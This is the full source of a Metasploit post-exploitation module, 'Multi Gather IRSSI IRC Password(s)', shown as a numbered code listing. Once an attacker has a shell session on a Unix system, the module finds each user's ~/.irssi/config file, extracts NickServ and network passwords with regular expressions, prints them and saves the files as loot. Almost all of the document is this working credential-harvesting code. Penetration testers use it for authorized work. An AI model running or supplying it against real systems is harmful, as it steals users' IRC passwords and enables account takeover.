CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Unix
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Multi Gather IRSSI IRC Password(s)',
15
        'Description' => %q{
16
          This module grabs IRSSI IRC credentials.
17
        },
18
        'Author' => [
19
          'Jonathan Claudius <jclaudius[at]mozilla.com>',
20
        ],
21
        'Platform' => %w[bsd linux osx unix],
22
        'SessionTypes' => %w[shell],
23
        'License' => MSF_LICENSE
24
      )
25
    )
26
  end
27

28
  def run
29
    print_status('Finding ~/.irssi/config')
30
    paths = enum_user_directories.map { |d| d + '/.irssi/config' }
31
    paths = paths.select { |f| file?(f) }
32

33
    if paths.empty?
34
      print_error('No users found with a ~/.irssi/config file')
35
      return
36
    end
37

38
    download_passwords(paths)
39
  end
40

41
  # Example of what we're looking for in the config...
42
  #
43
  # ***Identify Password Example***
44
  # autosendcmd = "/msg nickserv identify example_password ;wait 2000";
45
  #
46
  # ***Network Password Example***
47
  #    password = "example_password";
48
  #
49
  def contains_passwords?(path)
50
    data = read_file(path)
51
    identify_passwords = data.scan(%r{/\^?msg nickserv identify ([^\s]+)})
52
    network_passwords = data.scan(/^?password = "([^\s]+)"/)
53

54
    passwords = identify_passwords.flatten + network_passwords.flatten
55

56
    if passwords.any?
57
      print_good("Found IRC password(s) of #{passwords.join(',')} in irssi config at #{path}")
58
      return true
59
    end
60

61
    false
62
  end
63

64
  def download_passwords(paths)
65
    print_status "Looting #{paths.count} files"
66

67
    paths.each do |path|
68
      path.chomp!
69
      next if ['.', '..'].include?(path)
70

71
      next unless contains_passwords?(path)
72

73
      loot_path = store_loot(
74
        'irssi config file',
75
        'text/plain',
76
        session,
77
        read_file(path),
78
        path,
79
        'IRC Password'
80
      )
81
      print_good("irssi config with passwords stored in #{loot_path}")
82
    end
83
  end
84
end
85

86